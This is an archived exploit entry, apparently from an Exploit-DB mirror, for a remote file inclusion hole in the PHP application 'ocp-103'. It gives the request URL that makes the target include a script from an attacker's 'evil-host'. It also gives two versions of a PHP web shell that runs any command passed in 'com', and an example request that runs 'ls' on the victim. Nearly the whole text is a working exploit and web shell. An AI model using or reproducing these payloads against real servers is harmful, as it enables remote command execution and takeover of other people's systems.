exploit-db-mirror/exploits/php/webapps/574.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

36 lines
No EOL
508 B
Text

http://localhost/ocp-103/index.php?req_path=http ://evil-host/
On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.
<?php
$com = $_GET["com"];
system ("$com");
?>
Example of funcs.php if your host support php.
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
# milw0rm.com [2004-10-13]